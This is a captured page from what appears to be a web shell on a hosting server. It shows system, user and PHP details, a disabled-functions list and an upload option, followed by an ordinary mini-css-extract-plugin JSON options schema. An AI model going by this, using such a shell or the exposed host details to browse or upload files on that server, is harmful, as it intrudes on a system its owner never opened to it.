MOON
Server: Apache
System: Linux e2e-78-16.ssdcloudindia.net 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User: imensosw (1005)
PHP: 8.0.30
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/imensosw/chartapi.imenso.co/node_modules/mini-css-extract-plugin/dist/plugin-options.json
{
  "type": "object",
  "additionalProperties": false,
  "properties": {
    "filename": {
      "anyOf": [
        {
          "type": "string"
        },
        {
          "instanceof": "Function"
        }
      ]
    },
    "chunkFilename": {
      "anyOf": [
        {
          "type": "string"
        },
        {
          "instanceof": "Function"
        }
      ]
    },
    "experimentalUseImportModule": {
      "description": "Enable the experimental importModule approach instead of using child compilers. This uses less memory and is faster.",
      "type": "boolean"
    },
    "ignoreOrder": {
      "type": "boolean"
    },
    "insert": {
      "description": "Inserts `<link>` at the given position (https://github.com/webpack-contrib/mini-css-extract-plugin#insert).",
      "anyOf": [
        {
          "type": "string"
        },
        {
          "instanceof": "Function"
        }
      ]
    },
    "attributes": {
      "description": "Adds custom attributes to tag (https://github.com/webpack-contrib/mini-css-extract-plugin#attributes).",
      "type": "object"
    },
    "linkType": {
      "anyOf": [
        {
          "enum": ["text/css"]
        },
        {
          "type": "boolean"
        }
      ]
    }
  }
}